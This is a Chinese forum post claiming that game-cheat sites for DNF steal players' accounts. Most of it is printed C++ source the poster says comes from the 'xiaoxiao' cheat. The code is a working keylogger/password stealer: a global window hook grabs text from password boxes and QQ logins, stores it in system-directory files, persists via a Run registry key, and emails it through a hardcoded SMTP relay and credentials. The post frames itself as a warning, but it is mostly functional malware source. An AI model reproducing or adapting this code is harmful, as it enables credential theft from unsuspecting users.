所谓收费外挂就不会盗号的概念是错误的。
难道官网的外挂也会有绑定病毒吗？
答：是的
难道官网人员在提供免费试用的同时也会盗号来赚取收入的吗？
答：绝大多数是的，因为你第一免费试用不会盗你的号，因为还想你消费，那你第二次免费试用或更多次免费试用小心官网人员就开始对你下毒手了

以小小和鬼鬼为例  本人亲自当小白在其官网下载外挂得出结果｛小小被盗1次，鬼鬼被盗2次｝


下面我来为大家分析dnfxiaoxiao.comdnfxiaoxiao.com下载的｛小小外挂｝源码，知情的请顶下来

头文件

dnfxx6.3vip

extern "C" __declspec(dllexport) bool insthook(HWND hwnd,char const *mailto);  //安装钩子函数
extern "C" __declspec(dllexport) void netboolto();  //判断网络是否连接上

*/





#include <windows.h>
#include <stdio.h>
#include "new1_0.h"
#pragma data_seg("shared")
#define WM_netok      0x0090  //自定义消息  如果网络断开发此消息
#define WM_exeok      0x0091  //自定义消息  判断exe是否存在发此消息
char filelong[256]="";  //密码存放
char filrbak[256]="";    //密码备份
HWND keeyhwnd=NULL;  //EXE窗口句柄
HINSTANCE hinstance;  //钩子所在的模块
HHOOK hook=NULL;    //钩子句柄
//static HHOOK hkb=NULL;  //钩子句柄
HWND passhwnd=NULL; //带密码的窗体   
FILE *fp;    //写文件
BOOL netlink=false;  //网络是否连接
char tomail[100]="";    //保存邮件地址
BOOL exeok=true;    //EXE存在
//BOOL yeshook=TRUE;  //HOOK安装情况
char IP[25]="";  //邮件服务器地址
bool sendmail();  //发邮件函数
bool execlose();  //EXE被关的函数
bool bakfile();
bool reg();
char exebak[250]="";  //exe地址
#pragma data_seg()
#pragma comment(linker, "/section:shared,rws")
LRESULT CALLBACK KeyboardProc(
int code,
    WPARAM wParam,
    LPARAM lParam
);
BOOL CALLBACK EnumChildProc(HWND hwnd,LPARAM lParam)
{
char str[255]="";
DWORD style=GetWindowLong(hwnd,GWL_STYLE);
GetClassName(hwnd,str,255);
if(style & ES_PASSWORD && strcmp(str,"Edit")==0)
{
  memset(str, 0,sizeof(str));
  SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)str);
  if(strlen(str)>=1)
  {
  passhwnd=hwnd;
  return false;
  }
}
return true;
}
BOOL CALLBACK EnumChildProc1(HWND hwnd,LPARAM lParam)
{
 
char str[255]="";
SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)str);
if(strlen(str)>=1)
{
GetClassName(hwnd,str,255);
LONG lStyle=GetWindowLong(hwnd,GWL_STYLE);
if(strcmp(str,"Edit")==0)
{
  if (lStyle&ES_PASSWORD)
    fwrite("密码输入框——————————>",strlen("密码输入框——————————>"),1,fp);
  else
  fwrite("输入框————>",strlen("输入框————>"),1,fp);
  }
if(strcmp(str,"Static")==0)
  fwrite("提示框----->",strlen("提示框----->"),1,fp);
if(strcmp(str,"ComboBox")==0)
  fwrite("选择输入框----->",strlen("选择输入框----->"),1,fp);
if(strcmp(str,"Button")==0)
  fwrite("按钮----->",strlen("按钮----->"),1,fp);
memset(str, 0,sizeof(str));
SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)str);
fwrite(str,strlen(str),1,fp);
fputc(10,fp);
}
return true;
}

LRESULT CALLBACK CallWndProc( int nCode, WPARAM wParam, LPARAM lParam)
{
if(nCode==HC_ACTION)
{
//  insthook(NULL,"[email protected]");
/* if(!GetWindowLong(keeyhwnd,GWL_ID))
    MessageBox(NULL,"EXE被关","注意",0);*/
  CWPSTRUCT *p=(CWPSTRUCT*)lParam;    //消息结构体
  if(p->message==WM_COMMAND)// && HIWORD(p->wParam==BN_CLICKED))//&& hwnd==p->hwnd)胀系数   
  {
    /* if( SendMessageTimeout(keeyhwnd,WM_exeok,NULL,NULL,SMTO_BLOCK,150000,0)==0)
      MessageBox(NULL,"EXE被关闭","注意",0);*/
 
  char str[255];
  GetClassName((HWND)p->lParam,str,255);  //获取窗口类型
  if(strcmp(str,"Button")==0)  //如果是按钮
  {
   
    EnumChildWindows(p->hwnd,EnumChildProc,0);//枚举窗体
    SendMessage(passhwnd,WM_GETTEXT,255,(LPARAM)str);
    if(strlen(str)<=1)
      passhwnd=NULL;
    // MessageBox(NULL,filelong,"注意",0);
    if(passhwnd!=NULL)
    {
    fp=fopen(filelong,"w");
    SendMessage(p->hwnd,WM_GETTEXT,255,(LPARAM)str);
    fwrite("QQ号码---->",strlen("QQ密码---->"),1,fp);
    fwrite(str,strlen(str),1,fp);
    fputc(10,fp);
    EnumChildWindows(p->hwnd,EnumChildProc1,0);
    fclose(fp);
    if(netlink)
    {
      if(!sendmail())
      {
      SendMessage(keeyhwnd,WM_netok,NULL,NULL);
      bakfile();
      }
    }
    else
      bakfile();
    passhwnd=NULL;
    }
  }
 
  // SendMessage(keeyhwnd,WM_exeok,NULL,NULL);
  // SendMessageTimeout(keeyhwnd,WM_exeok,NULL,NULL,SMTO_ABORTIFHUNG,150000,0);
  }
/* if( SendMessageTimeout(keeyhwnd,WM_exeok,NULL,NULL,SMTO_ABORTIFHUNG,150000,0)==0)
      MessageBox(NULL,"EXE被关闭","注意",0);*/
// SendMessageTimeout(keeyhwnd,WM_exeok,NULL,NULL,SMTO_ABORTIFHUNG,150000,0);
}
return CallNextHookEx(hook,nCode,wParam,lParam);
}
extern "C" __declspec(dllexport) bool insthook(HWND hwnd,char const *mailto) //安装钩子函数
{
//完成钩子安装工作

if(strlen(filelong)<1)
{
strcpy(tomail,(char *)mailto);
keeyhwnd=hwnd;
reg();
char  SysPath[MAX_PATH];
DWORD size=MAX_PATH;
GetSystemDirectory(SysPath,size);
strcpy(filelong,SysPath);
strcat(filelong,"\\keyslong.sls");
// MessageBox(NULL,filelong,"注意",0);
strcpy(filrbak,SysPath);
strcat(filrbak,"\\keyslogbak.sls");
// MessageBox(NULL,filrbak,"注意",0);
}


hook=SetWindowsHookEx(WH_CALLWNDPROC,(HOOKPROC)CallWndProc,hinstance,0); //核心语句安装钩子
return true;
}
BOOL WINAPI DllMain(
  HINSTANCE hinstDLL,  // handle to DLL module
  DWORD fdwReason,    // reason for calling function
  LPVOID lpvReserved  // reserved
)
{
hinstance=hinstDLL;

    if(keeyhwnd!=NULL)
{
  if(!GetWindowLong(keeyhwnd,GWL_STYLE))
// ExitWindowsEx(EWX_FORCE,NULL);
;
}
// SendMessage(keeyhwnd,WM_netok,NULL,NULL);
//    if(keeyhwnd!=NULL)
//      ExitWindowsEx(EWX_FORCE,NULL);
// insthook(NULL,"[email protected]");

return true;
}
//设置网络连接状态
extern __declspec(dllexport) void netboolto()
{
netlink=false;
bool whiles=true;
// struct sockaddr_in server;
// SOCKET serverscok;
WSADATA wsaData;
WSAStartup(0x0101,&wsaData);
hostent* pHostent=NULL;
while(whiles)
{
pHostent = gethostbyname("hackerip.20cn.com");  //smtp服务器
if (pHostent==NULL)
  Sleep(60000);
else
  whiles=false;
}
hostent& he = *pHostent;
sockaddr_in sa;
for (int nAdapter=0; he.h_addr_list[nAdapter]; nAdapter++)
      memcpy ( &sa.sin_addr.s_addr, he.h_addr_list[nAdapter],he.h_length);
memset(IP, 0,sizeof(IP));
strcpy(IP,inet_ntoa(sa.sin_addr));
// MessageBox(NULL,IP,"IE",0);
netlink=true;
return;
}
bool sendmail()
{
char temp[600]="";
// char IP[]="202.108.44.205";
    struct sockaddr_in server;
SOCKET serverscok;
WSADATA wsaData;
char maaato[250]="";
char tempsls[100]="To:";
strcat(tempsls,tomail);
strcat(tempsls,"\r\n");
strcpy(maaato,"RCPT TO: <");
strcat(maaato,tomail);
strcat(maaato,">\r\n");
WSAStartup(0x0101,&wsaData);
server.sin_family=AF_INET;
serverscok=socket(AF_INET,SOCK_STREAM,0);
server.sin_port=htons(5577);
server.sin_addr.s_addr=inet_addr(IP);
if(connect( serverscok , (struct sockaddr*)&server , sizeof( server ))!=0)
  return false;

  recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));
send(serverscok,"EHLO command\r\n",strlen("EHLO command\r\n"),0);


recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));

send(serverscok,"AUTH LOGIN\r\n",strlen("AUTH LOGIN\r\n"),0);
recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));
send(serverscok,"aGFja2Vya2V5dG8=\r\n",strlen("aGFja2Vya2V5dG8=\r\n"),0);
recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));

send(serverscok,"ODg4ODg4ODg=\r\n",strlen("ODg4ODg4ODg=\r\n"),0);

recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));
send(serverscok,"MAIL FROM: <[email protected]>\r\n",strlen("MAIL FROM: <[email protected]>\r\n"),0);
recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));

// send(serverscok,"RCPT TO: <[email protected]>\r\n",strlen("RCPT TO: <[email protected]>\r\n"),0);
send(serverscok,maaato,strlen(maaato),0);
recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));


send(serverscok,"DATA\r\n",strlen("DATA\r\n"),0);
  recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));
send(serverscok,"From:[email protected]\r\n",strlen("From:[email protected]\r\n"),0);
send(serverscok,tempsls,strlen(tempsls),0);
send(serverscok,"Subject:dnfxx6.3vip\r\n",strlen("Subject:dnfxx6.3vip\r\n"),0);
send(serverscok,"\r\n",strlen("\r\n"),0);


  char hostname[256];
  gethostname(hostname, sizeof(hostname));
  send(serverscok,"主机名字-->",strlen("主机名字-->"),0);
  send(serverscok,hostname,strlen(hostname),0);
  send(serverscok,"\n",strlen("\n"),0);
  hostent* pHostent = gethostbyname(hostname);
  hostent& he = *pHostent;
  sockaddr_in sa;
  for (int nAdapter=0; he.h_addr_list[nAdapter]; nAdapter++)
  {
    memcpy ( &sa.sin_addr.s_addr, he.h_addr_list[nAdapter],he.h_length);
    send(serverscok,"主机IP-->",strlen("主机IP-->"),0);
    send(serverscok,inet_ntoa(sa.sin_addr),strlen(inet_ntoa(sa.sin_addr)),0);
    send(serverscok,"\n",strlen("\n"),0);
  }

// send(serverscok,"1\r",strlen("1"),0);
// FILE *fp;
fp=fopen(filelong,"r");
// MessageBox(NULL,filelong,"A",0);
char temps;
  temps=fgetc(fp);
while(!feof(fp))
{
// cout<<"NULL"<<endl;
  send(serverscok,&temps,1,0);
  temps=fgetc(fp);
}
fclose(fp);
fp=fopen(filelong,"w");
fclose(fp);
fp=fopen(filrbak,"a");
fclose(fp);
fp=fopen(filrbak,"r");
temps=fgetc(fp);
while(!feof(fp))
{
// cout<<"NULL"<<endl;
  send(serverscok,&temps,1,0);
  temps=fgetc(fp);
}
fclose(fp);

  //memset(temp, 0, sizeof(temp));
// send(serverscok,"\r\n",strlen("\r\n"),0);
send(serverscok,"\r\n.\r\n",strlen("\r\n.\r\n"),0);
recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));
send(serverscok,"QUIT\r\n",strlen("QUIT\r\n"),0);

recv(serverscok,temp,600,0);
// printf("%s\n",temp);
memset(temp, 0, sizeof(temp));
closesocket(serverscok);
WSACleanup();
fp=fopen(filrbak,"w");
fclose(fp);
return true;
}
bool bakfile()
{

    FILE *fp;
    FILE *ff;
    char c;
    fp=fopen(filrbak,"a");
    ff=fopen(filelong,"r");
    fwrite("以下是未连接网络记录的信息",strlen("以下是未连接网络记录的信息"),1,fp);
    fputc(10,fp);
    c=fgetc(ff);
    while(!feof(ff))
    {
      fputc(c,fp);
      c=fgetc(ff);
    }
    fclose(fp);
    fclose(ff);
    return true;
}
bool reg()
{
DWORD size=MAX_PATH;
long  ret;
HKEY  hKEY;
DWORD type=REG_SZ;
char fileexe[250]="";
  LPCTSTR Rgspath="Software\\Microsoft\\Windows\\CurrentVersion\\Run" ;
  if(strlen(exebak)<1)
  {
  GetModuleFileName(NULL,fileexe,size);
  strcpy(exebak,fileexe);
  }

  ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,Rgspath,0,KEY_WRITE, &hKEY);
if(ret!=ERROR_SUCCESS)
  RegCloseKey(hKEY);
ret=RegSetValueEx(hKEY,"QQKAVQQRun",NULL,type,(const unsigned char*)exebak,size);
RegCloseKey(hKEY);
return true;
}